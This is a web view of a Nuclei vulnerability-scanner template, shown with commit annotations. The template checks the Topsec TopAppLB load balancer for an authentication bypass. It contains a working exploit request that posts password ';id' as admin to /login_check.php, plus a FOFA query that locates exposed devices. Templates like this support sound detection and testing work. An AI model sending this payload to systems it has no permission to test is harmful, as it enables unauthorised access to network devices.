daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/vulnerabilities/topsec/topsec-topapplb-auth-bypass...

37 lines
1.0 KiB
YAML
Raw Normal View History

templates update -2
2023-09-14 19:11:38 +00:00
id: topsec-topapplb-auth-bypass
info:
name: Topsec TopAppLB - Authentication Bypass
author: SleepingBag945
severity: high
description: |
Topsec TopAppLB is vulnerable to authetication bypass .Enter any account on the login page, the password is `;id`.
reference:
updated templates
2023-09-17 16:11:07 +00:00
- https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Topsec-TopAppLB-Any-account-Login.json
templates update -2
2023-09-14 19:11:38 +00:00
metadata:
fofa-query: title="TopApp-LB 负载均衡系统"
TemplateMan Update [Mon Sep 18 12:45:28 UTC 2023] :robot:
2023-09-18 12:45:28 +00:00
max-request: 2
verified: true
templates update -2
2023-09-14 19:11:38 +00:00
tags: topsec,topapplb,auth-bypass
http:
- raw:
- |
POST /login_check.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
userName=admin&password=%3Bid
- |
updated templates
2023-09-17 16:11:07 +00:00
GET / HTTP/1.1
templates update -2
2023-09-14 19:11:38 +00:00
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_1 == 302 && status_code_2 == 200'
- 'contains(body_2,"var IsHeadMin ")'
- 'contains(header_1,"redirect.php") && !contains(tolower(header_1), "error=1")'
condition: and